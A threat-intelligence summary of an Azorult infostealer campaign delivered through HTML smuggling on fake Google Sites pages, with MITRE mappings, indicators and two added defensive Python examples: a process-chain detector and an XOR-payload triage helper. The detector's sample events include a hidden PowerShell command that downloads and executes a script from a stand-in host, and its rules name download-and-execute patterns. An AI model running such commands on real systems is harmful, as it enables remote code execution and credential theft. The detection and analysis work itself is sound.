From Delivery To Execution: An Evasive Azorult Campaign Smuggled Through Google Sites

Netskope Threat Labs dissected an evasive Azorult campaign that uses Google Sites as a decoy and employs HTML smuggling, CAPTCHA gating, AMSI bypass, and reflective code loading to deliver and execute a fileless infostealer. The attack chain includes an LNK-triggered PowerShell workflow that downloads a loader and scripts which load Azorult into memory and exfiltrate browser credentials, crypto wallet data, screenshots, and documents to a C2. #Azorult #GoogleSites

Keypoints

  • Initial delivery used HTML smuggling hosted on fake Google Sites pages; the malicious payload was stored as a Base64 string inside a separate JSON file hosted on a compromised domain.
  • The attacker gated the smuggled HTML with a CAPTCHA to prevent automated scanners from retrieving the payload.
  • The delivered payload is an LNK file that spawns a CMD batch file and a scheduled task to run a PowerShell chain; certutil.exe is used to decode an embedded PowerShell command.
  • JavaScript and PowerShell stages (qtoW0vI2.js → agent1.ps1 / agent3.ps1) persist to %ProgramData%, download additional scripts and binaries, and execute code via wscript.exe and Invoke-Expression/Invoke-WebRequest.
  • agent1.ps1 implements an AMSI bypass; agent3.ps1 downloads an Azorult loader (service.exe) and executes it in memory using reflective code loading (Marshal.Copy, VirtualAlloc, CreateThread).
  • A later stage (sd2.ps1) retrieves an XOR key from a C2, decodes the Azorult payload, and the .NET Azorult binary (pg20.exe) is loaded via Assembly.Load to harvest screenshots, browser logins, cookies, and crypto wallet extensions.
  • Collected data are compressed and encrypted (using a Curve25519-derived shared secret) and exfiltrated to the C2 over HTTP/HTTPS.

MITRE Techniques

  • [T1204.002] User Execution: Malicious File – The campaign relies on a malicious shortcut to trick users into running the payload (‘The payload is an LNK shortcut file that uses a PDF icon to trick users into clicking it.’)
  • [T1140] Deobfuscate/Decode Files or Information – certutil.exe, a signed native binary, is used to decode the Base64 PowerShell payload (‘The Powershell command is then decoded using a Windows native application named certutil.exe’)
  • [T1053] Scheduled Task/Job – The attack creates a scheduled task to run the decoded batch file (‘It then creates a scheduled task named t09pxsrXKG that executes the batch file Fyap4cKJ.bat.’)
  • [T1105] Ingress Tool Transfer – Multiple stages download components via web requests (Invoke-WebRequest) from compromised domains (‘…starts by downloading the Azorult loader (service.exe) from the earlier compromised domain using Invoke-WebRequest.’)
  • [T1620] Reflective Code Loading – The loader and shellcode are mapped and executed in the script's own process memory without writing the PE to disk (‘execute the Azorult infostealer in memory using reflective code loading.’)
  • [T1562.001] Impair Defenses: Disable or Modify Security Tools – The agent1.ps1 script forces AMSI initialization to fail to evade host-based scanning (‘The first powershell script (agent1.ps1) executed is used to bypass the Antimalware Scan Interface (AMSI).’)
  • [T1113] Screen Capture – Azorult takes screenshots of the primary display to collect visual data (‘Azorult initially collects a screenshot of the device’s screen.’)
  • [T1555.003] Credentials from Password Stores: Credentials from Web Browsers (and [T1539] Steal Web Session Cookie) – The malware copies browser artifacts (Login Data, Cookies, Web data) to exfiltrate credentials and session data (‘It copies the content of Chrome’s Login Data, Local State, Cookies, and Web data into the roaming folder path to be exfiltrated later.’)
  • [T1041] Exfiltration Over C2 Channel – Stolen files are encrypted then sent to a C2 server over HTTP/HTTPS (‘All stolen files and data are then transmitted to the C2 server over HTTP.’)

Indicators of Compromise

  • [Domain] delivery and payload hosting – mahmudiyeresort[.]com[.]tr (JSON payload host), sqjeans[.]com (JS/PHP payload host)
  • [File names] downloader and stage files – Fyap4cKJ.bat, qtoW0vI2.js, agent.js, agent1.ps1, agent3.ps1, service.exe, sd2.ps1, pg20.exe
  • [Scheduled Task] persistence/activation – t09pxsrXKG (task name used to execute the batch file)
  • [Executable] loader name – service.exe (Azorult loader fetched and executed in memory)

HTML smuggling hosted on Google Sites served as the initial vector: a fake Google Docs page references a separate compromised domain to fetch a JSON file containing a BASE64-encoded payload. The page presents a CAPTCHA to block automated scanners; once a user passes the CAPTCHA the embedded JavaScript reconstructs and downloads an LNK shortcut. When the LNK is opened it writes and runs a batch file (Fyap4cKJ.bat), uses certutil.exe to decode a Base64 PowerShell command, and creates a scheduled task (t09pxsrXKG) to execute further PowerShell stages.

The JavaScript stage (qtoW0vI2.js) copies itself to %ProgramData% as agent.js, checks for conditions under which it self-deletes, and downloads two PowerShell scripts (agent1.ps1 and agent3.ps1). agent1.ps1 forces AMSI initialization to fail so that subsequent script content is not handed to the host's scanner; agent3.ps1 downloads a binary loader (service.exe) and places its bytes into memory buffers. The script defines and copies shellcode ($sc) and the executable byte array ($image) into memory allocated via VirtualAlloc using Marshal.Copy, resolves the API addresses it needs (VirtualAlloc/CreateThread/WaitForSingleObject), then creates a thread to execute the in-memory payload, achieving reflective loading and leaving no PE on disk.
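The chain above, from the opened LNK through certutil, schtasks, wscript and PowerShell, is what a detection engineer would correlate in process-creation telemetry rather than alert on stage by stage. The Python below is an added example and is not code from the Netskope write-up: it runs one rule per stage over constructed Sysmon-style events (PIDs, paths and the example.invalid URL are invented; the file and task names are the ones reported) and groups hits by the root of the process tree, so the whole chain surfaces as a single alert.

```python
"""Correlate the LNK -> batch -> certutil -> schtasks -> wscript/PowerShell chain in
Sysmon-style process-creation events. Added example; the events below are constructed."""
import re
from collections import defaultdict

# One rule per stage. Every regex in "patterns" must match the command line.
RULES = [
    {"name": "cmd_batch_from_explorer", "attack": "T1204.002", "image": "cmd.exe",
     "parent_image": "explorer.exe",                      # how an opened LNK shows up in telemetry
     "patterns": [re.compile(r"\.(bat|cmd)\b", re.I)]},
    {"name": "certutil_decode", "attack": "T1140", "image": "certutil.exe",
     "patterns": [re.compile(r"\s-decode(hex)?\b", re.I)]},
    {"name": "schtasks_create_script", "attack": "T1053.005", "image": "schtasks.exe",
     "patterns": [re.compile(r"/create\b.*/tr\s+\"?[^\"\s]*\.(bat|cmd|js|vbs|ps1)\b", re.I)]},
    {"name": "wscript_programdata", "attack": "T1059.007", "image": "wscript.exe",
     "patterns": [re.compile(r"programdata\\[^\s\"]+\.js\b", re.I)]},
    {"name": "powershell_download_exec", "attack": "T1059.001", "image": "powershell.exe",
     "patterns": [re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile", re.I),
                  re.compile(r"invoke-expression|\biex\b", re.I)]},
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_rules(event):
    """Return [(rule name, ATT&CK id)] for every rule the event satisfies."""
    hits = []
    for rule in RULES:
        if _basename(event["image"]) != rule["image"]:
            continue
        if "parent_image" in rule and _basename(event.get("parent_image", "")) != rule["parent_image"]:
            continue
        if all(p.search(event["cmdline"]) for p in rule["patterns"]):
            hits.append((rule["name"], rule["attack"]))
    return hits


def root_of(pid, by_pid):
    """Walk ppid links up to the topmost process we hold an event for."""
    seen = set()
    while pid not in seen and pid in by_pid and by_pid[pid]["ppid"] in by_pid:
        seen.add(pid)
        pid = by_pid[pid]["ppid"]
    return pid


def detect(events, min_stages=2):
    """Group rule hits by process-tree root and alert when at least min_stages distinct
    stages appear under one root. A lone stage (cmd.exe running a .bat from Explorer,
    say) is far too noisy to alert on by itself."""
    by_pid = {e["pid"]: e for e in events}
    groups = defaultdict(list)
    for e in events:
        for name, attack in match_rules(e):
            groups[root_of(e["pid"], by_pid)].append(
                {"pid": e["pid"], "image": _basename(e["image"]), "rule": name, "attack": attack})
    alerts = []
    for root, hits in groups.items():
        rules = sorted({h["rule"] for h in hits})
        if len(rules) >= min_stages:
            alerts.append({"root_pid": root, "root_image": _basename(by_pid[root]["image"]),
                           "rules": rules, "hits": hits})
    return alerts


# Constructed sample events: PIDs, user paths and the example.invalid URL are invented;
# Fyap4cKJ.bat, t09pxsrXKG, agent.js and agent1.ps1 are the names in the report.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "parent_image": "",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /c "C:\Users\u\AppData\Local\Temp\Fyap4cKJ.bat"'},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil.exe -decode C:\Users\u\AppData\Local\Temp\p.txt C:\Users\u\AppData\Local\Temp\p.ps1"},
    {"pid": 202, "ppid": 200, "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'schtasks.exe /create /tn t09pxsrXKG /tr "C:\Users\u\AppData\Local\Temp\Fyap4cKJ.bat" /sc once /st 23:59'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "IEX (Invoke-WebRequest -UseBasicParsing '
                'http://example.invalid/agent1.ps1).Content"'},
    {"pid": 301, "ppid": 300, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"wscript.exe C:\ProgramData\agent.js"},
    # Benign noise: an isolated certutil and an ordinary PowerShell invocation.
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\certutil.exe", "parent_image": "",
     "cmdline": r"certutil.exe -verify C:\certs\corp.cer"},
    {"pid": 600, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": "", "cmdline": "powershell.exe -c Get-Date"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["root_image"], alert["root_pid"], alert["rules"])
```

The rules are deliberately narrow (certutil with `-decode`, schtasks whose `/tr` target is a script, wscript running a .js out of %ProgramData%, PowerShell that both fetches and evaluates content), and the tree-root grouping is what turns five low-confidence signals into one high-confidence incident. In a real deployment feed the same records from Sysmon event ID 1 or EDR process telemetry, and keep the parent image on every record, since the LNK itself never appears as a process.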

After initial in-memory execution, the loader fetches sd2.ps1, retrieves an XOR key from the C2, decodes the embedded Azorult binary, and loads the .NET payload (pg20.exe) via Assembly.Load. Azorult collects screenshots, browser databases (Chrome/Firefox login and cookie files), crypto-wallet extension data, and documents selected by file extension and filename, compresses and encrypts the stolen data using a Curve25519-derived shared secret, and exfiltrates the results to the C2 over HTTP/HTTPS.
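Because the XOR key is fetched from the C2 at run time, an analyst who has the encoded blob but not the C2 response still needs to get at the .NET payload. The Python below is an added example, not Netskope's or Azorult's code: it recovers a repeating XOR key by known plaintext (the `MZ` signature and the standard DOS stub string every normally linked PE carries), decodes the blob, and checks the CLR data directory to confirm the result is a .NET image of the kind Assembly.Load accepts. The PE header and the eight-byte key it runs against are constructed for the example; the only assumption about the real sample is the one the write-up states, a repeating-key XOR over the raw binary.

```python
"""Triage helper for an XOR-encoded PE payload like the one sd2.ps1 decodes before Assembly.Load.
Added example; the sample header and key are constructed, not taken from the campaign."""
import struct

# Bytes that standard linker output places at fixed offsets, usable as known plaintext.
DOS_STUB_TEXT = b"!This program cannot be run in DOS mode."
KNOWN_PLAINTEXT = {0x00: b"MZ", 0x4D: DOS_STUB_TEXT}


def xor_bytes(data, key):
    """Repeating-key XOR; encoding and decoding are the same operation."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(blob, max_len=41):
    """Recover a repeating XOR key from known plaintext when the C2 key fetch was not captured.
    Returns the shortest key consistent with every known byte. 41 consecutive stub bytes
    fully determine keys up to 41 bytes long; longer keys need more known plaintext."""
    for n in range(1, max_len + 1):
        key = [None] * n
        consistent = True
        for off, plain in KNOWN_PLAINTEXT.items():
            for i, p in enumerate(plain):
                slot = (off + i) % n
                k = blob[off + i] ^ p
                if key[slot] is None:
                    key[slot] = k
                elif key[slot] != k:
                    consistent = False
                    break
            if not consistent:
                break
        if consistent and None not in key:
            return bytes(key)
    return None


def pe_info(buf):
    """Validate MZ/PE signatures and report whether data directory 14 (the CLR runtime
    header) is populated, which is what marks a managed image for Assembly.Load."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    opt = e_lfanew + 24                            # 4-byte signature + 20-byte COFF header
    magic = struct.unpack_from("<H", buf, opt)[0]
    dirs = opt + (96 if magic == 0x10B else 112)   # data directories: PE32 at +96, PE32+ at +112
    clr_rva, clr_size = struct.unpack_from("<II", buf, dirs + 14 * 8)
    return {"pe32plus": magic == 0x20B, "is_dotnet": clr_rva != 0 and clr_size != 0}


def triage(blob, key=None):
    """Decode with a captured key, or recover one, then classify the result."""
    key = key or recover_key(blob)
    if key is None:
        return None
    info = pe_info(xor_bytes(blob, key))
    return None if info is None else {"key": key.hex(), **info}


def build_sample_pe(dotnet=True):
    """Constructed minimal PE32 header: DOS header, stub text, PE signature, COFF and optional header."""
    buf = bytearray(0x80 + 24 + 224)
    buf[0:2] = b"MZ"
    buf[0x4D:0x4D + len(DOS_STUB_TEXT)] = DOS_STUB_TEXT
    struct.pack_into("<I", buf, 0x3C, 0x80)                     # e_lfanew
    buf[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<HH", buf, 0x84, 0x14C, 1)                # Machine=i386, NumberOfSections=1
    struct.pack_into("<H", buf, 0x84 + 16, 224)                 # SizeOfOptionalHeader
    struct.pack_into("<H", buf, 0x80 + 24, 0x10B)               # PE32 optional-header magic
    if dotnet:
        struct.pack_into("<II", buf, 0x80 + 24 + 96 + 14 * 8, 0x2008, 0x48)  # CLR header directory
    return bytes(buf)


SAMPLE_KEY = bytes.fromhex("5a13f09c0731ee42")     # constructed 8-byte key
SAMPLE_BLOB = xor_bytes(build_sample_pe(), SAMPLE_KEY)

if __name__ == "__main__":
    print(triage(SAMPLE_BLOB))
```

If PowerShell script-block logging captured the key sd2.ps1 received, pass it as `key=` and skip recovery. The recovery path depends on the encoded file being a whole PE with a standard DOS stub; a sample whose stub was stripped or rewritten would need different known plaintext, and a scheme that is not a plain repeating XOR would not yield a consistent key at any length, which is itself a useful signal during triage.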

Read more: https://www.netskope.com/blog/from-delivery-to-execution-an-evasive-azorult-campaign-smuggled-through-google-sites